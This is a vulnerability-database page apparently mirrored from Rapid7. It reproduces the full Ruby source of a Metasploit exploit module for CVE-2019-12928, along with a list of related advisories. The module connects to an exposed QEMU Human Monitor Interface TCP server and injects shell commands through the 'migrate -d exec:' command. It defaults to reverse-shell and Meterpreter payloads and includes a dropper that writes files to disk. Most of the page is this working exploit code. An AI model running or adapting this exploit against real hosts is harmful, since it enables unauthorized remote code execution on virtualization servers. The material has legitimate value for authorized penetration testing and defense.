Lucene search
K

QEMU Monitor HMP 'migrate' Command Execution

🗓️ 08 Feb 2022 17:42:33Reported by bcoles <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 121 Views

QEMU Monitor HMP 'migrate' Command Execution module using QEMU's Monitor Human Monitor Interface (HMP) TCP server to execute system commands

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-12928
7 Feb 202222:01
circl
CVE
CVE-2019-12928
24 Jun 201910:06
cve
Cvelist
CVE-2019-12928
24 Jun 201910:06
cvelist
Debian CVE
CVE-2019-12928
24 Jun 201910:06
debiancve
NVD
CVE-2019-12928
24 Jun 201911:15
nvd
OSV
BELL-CVE-2019-12928 CVE-2019-12928 does not affect BellSoft software
24 Jun 201911:15
osv
OSV
CVE-2019-12928
24 Jun 201911:15
osv
OSV
DEBIAN-CVE-2019-12928
24 Jun 201911:15
osv
OSV
UBUNTU-CVE-2019-12928
24 Jun 201911:15
osv
Prion
Command injection
24 Jun 201911:15
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "QEMU Monitor HMP 'migrate' Command Execution",
        'Description' => %q{
          This module uses QEMU's Monitor Human Monitor Interface (HMP)
          TCP server to execute system commands using the `migrate` command.

          This module has been tested successfully on QEMU version 6.2.0
          on Ubuntu 20.04.
        },
        'License' => MSF_LICENSE,
        'Author' => ['bcoles'],
        'References' => [
          ['CVE', '2019-12928'],
          ['URL', 'https://wiki.qemu.org/ToDo/HMP'],
          ['URL', 'https://www.qemu.org/docs/master/system/monitor.html'],
          ['URL', 'https://www.qemu.org/docs/master/system/security.html'],
          ['URL', 'https://www.linux-kvm.org/page/Migration'],
        ],
        'Payload' => {
          'DisableNops' => true,
          'BadChars' => "\x00\x0a\x0d\x22",
          'Space' => 1010
        },
        'Targets' => [
          [
            'Unix (Command)',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
              'Type' => :unix_cmd
            }
          ],
          [
            'Linux (Dropper)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64 ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
                'PrependFork' => true,
                'MeterpreterTryToFork' => true
              },
              'Type' => :linux_dropper
            }
          ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        },
        'Privileged' => false,
        'DisclosureDate' => '2011-12-02'
      )
    )
  end

  def read_until_prompt
    ::Timeout.timeout(10) do
      loop do
        res = sock.get_once
        break if res.nil?
        break if res.to_s.include?('(qemu)')
      end
    end
  end

  def check
    connect
    banner = sock.get_once.to_s
    disconnect

    unless banner.include?('QEMU') && banner.include?('monitor')
      return CheckCode::Safe('Service is not QEMU monitor HMP.')
    end

    CheckCode::Appears('QEMU monitor HMP service is running.')
  end

  def execute_command(cmd, _opts = {})
    cmd = cmd.gsub('\\', '\\\\\\')
    vprint_status("Executing command: #{cmd}")
    sock.put("migrate -d \"exec:#{cmd}\"\n")
    read_until_prompt
  end

  def exploit
    connect
    read_until_prompt

    print_status "Sending payload (#{payload.encoded.length} bytes) ..."

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(linemax: 1010, background: true)
    end
  ensure
    disconnect unless sock.nil?
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation